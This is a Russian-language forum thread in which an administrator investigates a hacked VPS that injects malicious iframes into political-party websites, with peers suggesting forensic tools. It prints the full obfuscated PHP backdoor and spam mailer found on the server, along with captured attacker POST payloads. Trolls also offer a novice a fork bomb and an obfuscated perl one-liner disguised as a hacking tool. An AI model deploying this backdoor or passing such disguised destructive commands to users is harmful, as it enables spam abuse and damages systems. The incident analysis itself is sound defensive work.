mva 21.12.2012 13:11 N900

А какую софтину можно повесить шпионить, чтобы она сказала, какой процесс (pid, имя, от какого юзера запущен) изменяет указанный файл?

Предыстория: какая-то блядь провирусовала венду у одного из наших партийных деятелей, который имееи доступ к ряду партийных сайтов (т.к. пилит их). И по началу, как мне показалось (всё указывало именно на это) заливала по scp/sftp "пропатченые" вирусными айфреймами яваскрипты. Я выпилил у всех доступ по ssh, но какого-то хуя правки файлов продолжаются до сих пор, даже спустя пару ребутов впски.
Отсюда у меня две догадки — либо залили руткит (но в списке процессов абсолютно ничего подозрительного), либо залили какую-то херню в код движка, с помощью которой хулиганят через web, но, что-то, тоже не нахожу ничего такого...

?, Linux
Recommended by:

@rapture: >залили руткит > но в списке процессов ничего не видно ХМ.

and @Mellon, @ruda, @silvery, @rman
1. anonim 21.12.2012 13:12 4 минуты назад

Недавно кукарекали про вирусы в виде модулей апача, посмотри.

2. nebeda 21.12.2012 13:14 nyaserver

если есть шанс на взлом, то есть шанс на подмену ядра или виртуализацию системы, тогда ты вообще не увидишь что происходит :3

3. mvaanonim /1 21.12.2012 13:15 N900

нету апача

4. mvanebeda /2 21.12.2012 13:16 N900

нету шанса на подмену ядра, ибо Xen. Ноду никто не ломал. Зараза не ушла дальше одной из 15 впсок

5. nebedamva /4 21.12.2012 13:17 nyaserver

>ибо Xen
што?

если сама впска ломана, кто мешает поменять ей ведро а дальше из перезагрузки делать что хочешь

6. kronos 21.12.2012 13:18 AlfaMaR

фиг его знает.
советую пересмотреть каталог винды на время когда изменялись файлы.
ещё может помочь Antivir task manager.
скорее всего залили что то типа бекдора.
и ещё вопрос,пробовал сменить пароли на доступах?(ftp,ssh etc.)
возможно злоумышленник имеет доступ только к ним,что существенно упрощает задачу.

7. mvanebeda /5 21.12.2012 13:19 N900

подменить ведро ей мешает то, что оно находится снаружи неё

8. mvakronos /6 21.12.2012 13:19 N900

"каталог венды"? антивир таск менеджер? щто?

9. nebedakronos /6 21.12.2012 13:19 nyaserver

хрень, имея доступ по ssh не сделать себе нормальный вход

10. mvakronos /6 21.12.2012 13:19 N900

и да, доступы по ssh/sftp без паролей, по ключам. Все ключи выпилил.

11. kronosmva /8 21.12.2012 13:20 AlfaMaR

:-) я так понял сервак на виндузе?

12. mvakronos /11 21.12.2012 13:20 N900

нет. Смотрим теги.

13. nebedakronos /11 21.12.2012 13:20 nyaserver

LOL

14. kronosnebeda /13 21.12.2012 13:21 AlfaMaR

как бы это ни смешно не звучало,но наше правительство любит виндоуз.
+ это "Предыстория: какая-то блядь провирусовала венду "

15. anonimkronos /14 21.12.2012 13:21 4 минуты назад

Он про ППР, до правительства еще далеко.

16. kronosanonim /15 21.12.2012 13:22 AlfaMaR

ааа,тьфу ты)))
ну ебана,может быть шелл или подобное тогда...

17. gisty 21.12.2012 13:22 Gajim3228BFA2

> либо залили руткит (но в списке процессов абсолютно ничего подозрительного)
а его там и не будет, это же руткит

18. hirthworkmva /7 21.12.2012 13:22 mcabber

LD_PRELOAD и shadowing функций open и write? топорно, но быстро и, наверное, эффективно

19. anonimkronos /16 21.12.2012 13:23 4 минуты назад

Шелл спалить легко, я думаю, @mva уже проверил. Тут руткит какой-то.

20. kronosanonim /19 21.12.2012 13:24 AlfaMaR

почему легко?в наше время шеллы стали умнее.

21. mvaanonim /19 21.12.2012 13:27 N900

ну, я тоже как бы не каждый файл под лупой рассматривал. Может и пропустил шелл. Но так, на вскидку, да, что-то не видно...

22. gistymva /21 21.12.2012 13:28 Gajim3228BFA2

ты их вручную просматривал?
диффни нынешнюю версию скриптов на сайте и последнюю версию из бекапа.

23. nebedamva /21 21.12.2012 13:28 nyaserver

вот проблемушки-то: взять древний быкап всей впски да и накататить

24. mvagisty /22 21.12.2012 13:30 N900

диффал. Только айфреймы с вирусами. Ну и согласно логам ssh — до момента, пока я выпилил — каждый раз при изменении был коннект по sftp от того человека с вендой (хотя он клянётся, что не заливал ничего уже месяц). Вот только сейчас-то туда никто не коннектится (после первого же фейла)

25. mvanebeda /23 21.12.2012 13:31 N900

Ну, не такие и сильные. ПРосто жалко тот контент, что проебётся.

26. kronosmva /24 21.12.2012 13:31 AlfaMaR

мб бекдор?

27. artsmva /10 21.12.2012 13:38

А существующие коннекты прибил?

28. nebedaarts /27 21.12.2012 13:38 nyaserver

лолд

29. artsnebeda /28 21.12.2012 13:39

штоблядь

30. mvaarts /27 21.12.2012 13:40 N900

впска ребуталась же пару раз. Это не смотря на то, что единственные два существующих коннекта — от меня: один tail -f лог вебсервера, второй — насройка sys-process/audit

31. mva 21.12.2012 13:44 N900

@rapture проблема в том, что на Xen запилить руткит, который бы не палился при этом не поломав ноду — малоосуществимо.

32. nebedamva /31 21.12.2012 13:44 nyaserver

похоже на городскую легенду

33. gisty 21.12.2012 13:49 Gajim3228BFA2

man fuser

34. mvagisty /33 21.12.2012 13:50 N900

в бесконечном цикле штоле?

35. mvamva /34 21.12.2012 13:50 N900

нахуй надо, лучше sys-process/audit

36. gistymva /34 21.12.2012 13:50 Gajim3228BFA2

inotifywait нэ?

37. anonimmva /34 21.12.2012 13:50 4 минуты назад

В incron можно.

38. rapturemva /31 21.12.2012 13:53 unknow

ты список процессов в гостевой чем просматриваешь?

39. mvarapture /38 21.12.2012 13:59 N900

ps || htop

40. mvamva /39 21.12.2012 14:12 N900

что-то, судя по всему, это таки шелл, ибо после того, как я прибил веб-сервер вроде прекратилось но я таки не могу его найти.

41. SirAnthony 21.12.2012 14:46 home

lsof + sed не помогут?

42. mvaSirAnthony /41 21.12.2012 14:49 N900

я уже выяснил, что походу дела шелл подложили. Только не могу найти где. Сейчас буду откатывать исходники сайтов

43. Mellonmva /42 21.12.2012 14:51 Azoth

qcheck сделол, или что ещё типа такого, если другие дистры?

44. kronosmva /42 21.12.2012 14:51 AlfaMaR

глянь файлы у которых права доступные для записи файлов.и ты быстро найдешь шелл.на дату и размер внимание не обращай,щас шеллы хитрожопее.

45. gistykronos /44 21.12.2012 14:56 Gajim3228BFA2

пхп?

46. mvagisty /45 21.12.2012 14:56 N900

да, друпал (ну и ещё медиавики)

47. gistymva /46 21.12.2012 15:03 Gajim3228BFA2

ты точно все файлы дифнул? алсо сделай find / -name *.php, могли шелл залить в рандомное место и через lfi использовать. алсо, что у тебя в disabled functions в php.ini?

48. silvery 21.12.2012 15:37

Как бы ты сам внедрялся? Я думаю, что в конце серии опять окажется, что у тебя расслоение личности, так что подготовься и к такому варианту.

49. mva 21.12.2012 16:04 N900

сколько процентов вероятности что это — НЕ зловред? :)

@error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; if ($v10497e3f) $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; else $v9a5cb5d8 = "$vee11cbb1@[$v0897acf4]"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][ 0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>

50. gistymva /49 21.12.2012 16:06 Gajim3228BFA2

0. и где оно было?

51. kronosmva /49 21.12.2012 16:07 AlfaMaR

не очень похоже,но оно может быть закриптовано..

52. gistykronos /51 21.12.2012 16:18 Gajim3228BFA2

обфусцированно же

53. kronosgisty /52 21.12.2012 16:19 AlfaMaR

цыц хлопцы,жто может и не шелл оказатся.

54. mvagisty /50 21.12.2012 16:20 N900

на пиратмедии, в картинках. Там вообще джумла стоит.

55. mvamva /54 21.12.2012 16:21 N900

*джумла 1.5 даже, вроде

56. anonimmva /49 21.12.2012 16:21 4 минуты назад

Это шелл от oRb.

57. anonimanonim /56 21.12.2012 16:22 4 минуты назад

WSO, всмысле.

58. kronosanonim /57 21.12.2012 16:22 AlfaMaR

WSO?а как же он автоматически ифреймит?бред=)

59. anonimkronos /58 21.12.2012 16:23 4 минуты назад

Так через шелл заходят и ифреймят, хули.

60. gistykronos /58 21.12.2012 16:23 Gajim3228BFA2

скорее всего помимо шелла там еще и ифреймер где-нибудь висит.

61. anonimgisty /60 21.12.2012 16:24 4 минуты назад

Может и висит, да.

62. gistygisty /60 21.12.2012 16:24 Gajim3228BFA2

или автоматический ифреймер, который удаленно работает через wso.

63. mvaanonim /61 21.12.2012 16:24 N900

ставлю пост технического директора ППР тому, кто найдёт айфреймер :)

64. gistymva /63 21.12.2012 16:27 Gajim3228BFA2

лень искать?)

65. mvagisty /64 21.12.2012 16:27 N900

да :)

66. nebedamva /63 21.12.2012 16:38 nyaserver

а доступ покопаться всем подряд дашь? Ж3

67. anonimnebeda /66 21.12.2012 16:39 4 минуты назад

Пока есть только доступ у того, кто залил шелл, значит он и станет новым техническим директором ППР.

68. nebedaanonim /67 21.12.2012 16:39 nyaserver

ахуенный профит заливаться к ленивым одминам yeah

69. gisty 21.12.2012 16:44 Gajim3228BFA2

кстати, куда фрейм-то трафик льет?

70. mvagisty /69 21.12.2012 16:45 N900

web@party [±:master] www % git log -p | head -n500 | piratepaste
http://paste.pirate-party.ru/aabf6e05.tx...

71. gistymva /70 21.12.2012 16:53 Gajim3228BFA2

хром мне сказал делать мне там нечего, потому что там малварь, лол

72. gistynebeda /68 21.12.2012 16:54 Gajim3228BFA2

большинство админов, пока их носом не ткнут, даже и не подозревает, что у них что-то куда-то там залили, лол

73. anonimgisty /71 21.12.2012 16:54 4 минуты назад

Там ничего уже нету.

74. gistyanonim /73 21.12.2012 16:56 Gajim3228BFA2

он мне про paste.pirate-party.ru это сказал

75. anonimgisty /74 21.12.2012 16:57 4 минуты назад

А, ну это потому что на pirate-party.ru малварь наверное.

76. gistyanonim /75 21.12.2012 16:58 Gajim3228BFA2

а про pirate-party.ru ничего не сказал

77. anonimgisty /76 21.12.2012 16:59 4 минуты назад

У меня фф наоборот про pirate-party.ru сказал, даже в гугле This site may harm your computer.

78. gistygisty /76 21.12.2012 17:00 Gajim3228BFA2

а, это он непосредственно про http://paste.pirate-party.ru/aabf6e05.tx... сказал. на paste.pirate-party.ru он ничего не говорит.

79. anonimgisty /78 21.12.2012 17:01 4 минуты назад

А, ну может ему такой код вставки айфрейма непонравился.

80. gistyanonim /79 21.12.2012 17:03 Gajim3228BFA2

бля, теперь и на главную paste.pirate-party.ru ругается и на главную pirate-party.ru. только что ничего этого не было

81. anonimgisty /80 21.12.2012 17:03 4 минуты назад

Базы обновились.

82. gisty 21.12.2012 17:06 Gajim3228BFA2

mva, а paste.pirate-party.ru у тебя на той же виртуалке, что и все остальные висит? всмысле фс у них одна?

83. mvagisty /78 21.12.2012 17:11 N900

потому что в пасте, ВНЕЗАПНО, айфреймы. Но хрому почему-то поебать, что там text/plain ;)

84. mvamva /83 21.12.2012 17:12 N900

потому что я в пасту залил дифф файлов между двумя обновлениями ссылок от айфреймера

85. gistymva /83 21.12.2012 17:12 Gajim3228BFA2

хром уже на все страницы срет "The Website Ahead Contains Malware!"

86. mvagisty /82 21.12.2012 17:12 N900

и таки нет, они в разных виртуалках. глашне ppru на "party", а paste — на другой :)

87. mvagisty /85 21.12.2012 17:13 N900

тыкни в "дополнительно" и "мне поебать" :)

88. gistymva /87 21.12.2012 17:13 Gajim3228BFA2

это я знаю, важен сам факт того, что на глагне pirate-party.ru теперь не пускает говоря про виросы

89. anonimgisty /88 21.12.2012 17:14 4 минуты назад

Там и есть вирусы. И на пайратмедии. А на местном пастбине — нет.

90. mvagisty /88 21.12.2012 17:15 N900

да, там охуенный вирус "извините, у нас ремонт" :)

91. anonimmva /90 21.12.2012 17:15 4 минуты назад

В базу уже попал, так что все равно придется ждать, пока уберут

92. gistymva /87 21.12.2012 17:17 Gajim3228BFA2

еще минут 10 назад глагне пират-парти у меня открывалалсь нормально.

93. mvagisty /92 21.12.2012 17:18 N900

не могло. Ибо оно уже 4 часа ка выпилено

94. anonimgisty /92 21.12.2012 17:19 4 минуты назад

Так потому что базы обновились у тебя сейчас, сказал же. Алсо, у меня уже фф уже не возникает, может уже убрали.

95. gistymva /93 21.12.2012 17:19 Gajim3228BFA2

всмысле без плашки "виросы"

96. mvagisty /95 21.12.2012 17:49 N900

некоторые люди рапортуют, что у них ок

97. anonimmva /96 21.12.2012 17:50 4 минуты назад

У меня.

98. Mellonmva /96 21.12.2012 17:51 Azoth

ну, те кто напрямую, и отключили всю эту xss и антифишинговую хуиту, те вот нормально проходят. А вот те вот. что с гуля прут — огребают плашку, я те в конфу пруфы уже кинул

99. MellonMellon /98 21.12.2012 17:51 Azoth

*гугля

100. 238328anonim /57 21.12.2012 17:53

где для винды такое скачать?

101. gisty238328 /100 21.12.2012 17:56 Gajim3228BFA2

тебе шелл для виндо-сервера?

102. kronos238328 /100 21.12.2012 17:56 AlfaMaR

идиот шоле?это шелл такой.

103. anonim238328 /100 21.12.2012 17:57 4 минуты назад

На http://lemonparty.biz

104. 238328kronos /102 21.12.2012 17:57 27996905391356110346462810

я не идиот, я специалист, это раз, а ты сейчас соси хуй //)))затраллил карочи тебя, и пукан твой
ну шелл и чо, думаешь я слов таких не знаю?

105. 238328anonim /103 21.12.2012 17:57 27996905391356110346462810

ну дай кейворды хотя бы

106. 238328gisty /101 21.12.2012 17:58 27996905391356110346462810

нет

107. kronos238328 /104 21.12.2012 17:58 AlfaMaR

я конечно конечно поступил грубо,но твои слова были смешны

108. gisty238328 /106 21.12.2012 17:58 Gajim3228BFA2

тогда ты хуйню спизданул

109. anonim238328 /105 21.12.2012 17:58 4 минуты назад

wso скачать бесплатно без регистрации и смс // ппц ты тупой

110. kronosanonim /109 21.12.2012 17:59 AlfaMaR

ладно тебе,все ошибаются.

111. 238328gisty /108 21.12.2012 17:59 27996905391356110346462810

почему?

112. 238328anonim /109 21.12.2012 18:00 27996905391356110346462810

а вот теперь ты тупой, ппц канеш //

113. anonim238328 /112 21.12.2012 18:00 4 минуты назад

Блядь, спалили.

114. kronosanonim /113 21.12.2012 18:03 AlfaMaR

не сорьтесь людт

115. mva 21.12.2012 18:05 N900

вы все хуй

116. 238328kronos /114 21.12.2012 18:05 27996905391356110346462810

нет ну он ппц тупым меня назвал, ты представляешь? Он даже не читал мой блог а уже кидается ТАКИМИ словами, я бы ему уебал бы уже давно, он думает я не могу узнать где он живет, поэтому такой борзый

117. 238328mva /115 21.12.2012 18:05 27996905391356110346462810

на самом деле мы просто подгоняем тебя в решении проблемы

118. anonim238328 /116 21.12.2012 18:06 4 минуты назад

Го на петрарке завтра один на один.

119. mvaanonim /118 21.12.2012 18:07 N900

нашёл лоха, давай в люблино

120. kronos238328 /112 21.12.2012 18:07 AlfaMaR

лови шелл,WSO:

121. gistymva /119 21.12.2012 18:08 Gajim3228BFA2

на петрашку с красной розой

122. 238328kronos /120 21.12.2012 18:08 27996905391356110346462810

---------------------------
wso
---------------------------
Windows не удалось найти 'wso'. Проверьте, что имя было введено правильно, и повторите попытку. Чтобы выполнить поиск файла, нажмите кнопку "Пуск", а затем выберите команду "Найти".
---------------------------
ОК
---------------------------

123. mvagisty /121 21.12.2012 18:08 N900

да, ровно в шесть

124. 238328anonim /118 21.12.2012 18:08 27996905391356110346462810

ппц ты дерзкий

125. gisty238328 /122 21.12.2012 18:09 Gajim3228BFA2

ну все, теперь-то ты точно тупой// wso — пхп-скрипт

127. 238328gisty /125 21.12.2012 18:10 27996905391356110346462810

бля xDDD сори посаны
//чо делать-то?
ну и чо нахуй? я твой пхп не знаю, он для быдланов, ты бы норм тулзу скинул, макака ебаная

128. mva238328 /127 21.12.2012 18:11 N900

ебать ты лох

129. 238328kronos /126 21.12.2012 18:11

No javascript available!
Your browser does not support JavaScript or JavaScript is disabled. You must enable JavaScript or use a JavaScript supported browser for this site to function correctly.

130. 238328mva /128 21.12.2012 18:11 27996905391356110346462810

и что, ты от этого лохом быть не перестаёшь

131. mva238328 /130 21.12.2012 18:12 N900

нетты

132. kronos238328 /129 21.12.2012 18:12 AlfaMaR

джава скрипт включить не можешь?ппц

133. anonim238328 /127 21.12.2012 18:12 4 минуты назад

Переписал на перле — perl -e '$??s:;s:s;;$?::s;;=]=>%-{←|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

134. gisty238328 /127 21.12.2012 18:12 Gajim3228BFA2

нахуй тебе норм тулза, ты же ей пользоваться не умеешь. еще ебнешь пентагон, чо потом, передачки тебе таскать в алькатраз?

135. 238328mva /131 21.12.2012 18:13 27996905391356110346462810

это не меня унижают и опускают в своей же собственной впске, а тебя!

136. mvaanonim /133 21.12.2012 18:13 N900

переписал на баше:
:(){ :|:& };:
(прописывать в /etc/rc.conf)

137. 238328kronos /132 21.12.2012 18:13 27996905391356110346462810

там качается без жс

138. 238328anonim /133 21.12.2012 18:14 27996905391356110346462810

лайк если тоже тогда запустил от рута и бугуртил весь тред)))))))))

139. mva238328 /135 21.12.2012 18:14 N900

проблема в том, что впска — не моя. Моя нода. А на впске хуйнёй маятся пираты. Просто т.к. у них нет админа — мне приходится за ними разгребать говно

140. 238328gisty /134 21.12.2012 18:14 27996905391356110346462810

лол. Это ты проанализировал и заключил вот всё это по моим последним 10 комментариям? Норм ты//не общайся со мной больше, ты тупой какой-то

141. kronosmva /139 21.12.2012 18:15 AlfaMaR

давайте жить дружно?(

142. gisty238328 /140 21.12.2012 18:15 Gajim3228BFA2

нет, я еще твой блог прочитал. весь //нетты

143. 238328mva /136 21.12.2012 18:16 27996905391356110346462810

>/etc/rc.conf
у тебя поттерингфобия!

144. anonim238328 /140 21.12.2012 18:16 4 минуты назад

Бля ппц только асечку не ломай мне плз.

145. 238328mva /139 21.12.2012 18:17 27996905391356110346462810

скажи, что они все хуй

146. 238328gisty /142 21.12.2012 18:18 27996905391356110346462810

спасяб)) ну и как? Я вот считаю что в августе было слишком толстовато, а две недели назад слишком сложные концепции я форсил сильно, поэтому никто не понял. А ты?

147. 238328anonim /144 21.12.2012 18:18 27996905391356110346462810

я бы сломал твою писечку //

148. gisty238328 /146 21.12.2012 18:22 Gajim3228BFA2

норм

149. mvamva /49 21.12.2012 23:08 N900

а вот что он этому шеллу через POST отправляет, например:
lCwrx=OTlnemFud3FrdGddYEJua3RnLGFtbw==&edAmyC=ibnLVDwFYB&mqTRO=b3owLGptd m9ja24sYW1v&dvnGH=PldRR1A8bndyZ11vY3p1Z25uPi1XUUdQPAg%2BTENPRzwgTndyZyJPY3p1 Z25uID4tTENPRzwIPlFX
QEg8VWpjdiVxImpjcnJnbGtsZSInUF1MQ09HJz4tUVdASDwiCD5RQE1GWzwIPkowPD5jImpwZ2Q%2F
IGp2dnI4LS1lcGx1a3Zqb2csYW1vLWMwUERaNyxqdm9uIDxAbm1sZiJgZ2N3dnsia2wicXZtYWlr
bGVxIm93ZGRma3RnZiIkImR3YWlnZiJkZG8%2BLWM8Pi1KMDwIPnI8ZGdnYG57ImNsZiJkZ2NwZHdu
bnsiYGNhaSwiUGduY3oiSGtvLiJxa3YiYGNhaSJjbGYiZ2xobXsidmpnInBrZmcsYyJubWN2anFt
b2dueyJkY29rbmtjcCJ0bWthZyJlcGN2Z2YiZHBtbyJ2amciZmtwZ2F2a21sIm1kInZqZyJxd2Zm
Z2xueyJFbW1mLCJDbGYidmdubiJvZy91amN2ImtxImMiZWNxdnBtcmptbGcuIm1wImMiYGNlcmty
Zz1ubWxlZ3AvY2xmIiJveyIiQWpjcGttdiJtZCJEa3BnInFqd2ZmZ3BnZiJjbGYiImBnZWNsIiJ2
bSIicW5tdW57IiJwbW4%2BLXI8CD4tUUBNRls8CA%3D%3D
&uAul=Y2BXd01URmt2QEU=

150. mvamva /149 21.12.2012 23:08 N900

кто сможет раскусить?

151. mvamva /150 21.12.2012 23:09 N900

ещё вариант —

lsdgQw=OTllY3Fpa2xxbmtkZ0J7Y2ptbSxhbQ==&eykNKf=ejtrBsdSy&dMlKYC=PldRR1A8 YWNwb2dubmNdaWdsbGdmez4tV1FHUDwIPkxDT0c8IEFjcG9nbm5jIklnbGxnZnsgPi1M
Q09HPAg%2BUVdASDxEdTgiJ1BdTENPRyciRWd2ImtsImpncGc%2BLVFXQEg8Igg%2BUUBNRls8CD5KMD w%2B
YyJqcGdkPyBqdnZyOC0tY2xlZ25tamNrcDczLHB3LWtvY2VncS1xdm1wa2dxLWM0e0ssanZvbiA8
UXZ3cmtmImBubWxmIm9rbmQiZWd2cSJrbHZncHBjYWtjbiJkd2FpPi1jPD4tSjA8CD5yPHZqZyIi
cXZwY2xlZyJhbWxxdnB3YXZrbWwsIktsImRjYXYiSyJqY2Yia3Yid2xmZ3AibWBxZ3B0Y3ZrbWwi
ImN2IiJ2amdge3F2Y2xmZ3BxImNsZiJtYWFjcWttbGNubnsiZWt0a2xlImMicG17Y24iZG5rYWki
bWQidmpnImpjbGYiImN2IiJxbW9nY2xmIksidWdsdiJjbGYicWN2Im1sInZqZyJnZmVnIm1kInZq
ZyJ2Y2BuZyJsZ3p2InZtImt2LGZnYWtxa21sLCJVZyJqY3RnImpnY3BmLiJkcG1vInBnbmtjYG5n
InFtd3BhZ3EuInZqY3YidmpncGcia3EiInZtIiJgPi1yPAg%2BLVFATUZbPAg%3D
&MEGwA=TGRVUW9RQHVGaEM=

152. gistymva /151 21.12.2012 23:12 Gajim3228BFA2

логин/праоль скорее всего и какая-то хуйня в бейс64. лень в код вчитываться

153. mvagisty /152 21.12.2012 23:14 N900

ну, хз.
Алсо, я заметил, что во всех его попытках первая буква l, а после первого "равно" всегда OTl

